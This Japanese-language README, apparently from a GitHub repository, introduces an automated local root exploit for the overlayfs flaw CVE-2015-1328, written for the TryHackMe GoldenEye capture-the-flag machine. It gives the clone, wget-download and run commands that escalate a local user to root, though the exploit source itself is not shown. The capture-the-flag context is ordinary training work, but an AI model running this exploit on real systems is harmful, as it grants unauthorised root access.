
overlayfs の実装は、Ubuntu 15.04 までの linux (別名 Linux kernel) パッケージ 3.19.0-21.21 より前のバージョンにおいて、上位ファイルシステムディレクトリ内でのファイル作成のパーミッションを適切にチェックしません。これにより、ローカルユーザーが、任意のマウント名前空間で overlayfs が許可されている構成を悪用して root アクセスを取得できる可能性があります。
rebel に感謝
これは、TryHackMe の GoldenEye CTF 向け CVE-2015-1328 の自動エクスプロイトです。 デフォルトでは、そのマシンには gcc が存在しないため、gcc を cc に設定し、それに合わせてエクスプロイトを実行して root 権限を取得しました。
インストール
リポジトリをクローンするだけです -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit